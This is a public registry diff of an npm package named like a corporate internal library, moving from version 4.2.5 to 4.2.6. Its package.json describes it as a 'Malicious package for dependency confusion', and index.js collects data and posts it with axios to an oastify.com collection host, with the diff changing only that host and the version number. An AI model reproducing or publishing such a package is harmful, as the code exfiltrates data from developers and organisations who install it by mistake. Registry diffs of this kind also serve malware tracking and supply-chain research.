@visma-spcs-registry/react-common-components 4.2.5 → 4.2.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -98,7 +98,7 @@ async function collectData() {
98
98
  console.log(data); // Tampilkan data yang dikumpulkan
99
99
 
100
100
  // Kirim data ke server target
101
- axios.post('https://owo1psomvgl0vrfn7t4uf1d4uv0mocc1.oastify.com/log', data)
101
+ axios.post('https://szv138mpq6spdy0w5icr8zg7kyqpef24.oastify.com/log', data)
102
102
  .then(response => {
103
103
  console.log('✅ Data berhasil dikirim:', response.data);
104
104
  })
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@visma-spcs-registry/react-common-components",
3
- "version": "4.2.5",
3
+ "version": "4.2.6",
4
4
  "description": "Malicious package for dependency confusion",
5
5
  "main": "index.js",
6
6
  "scripts": {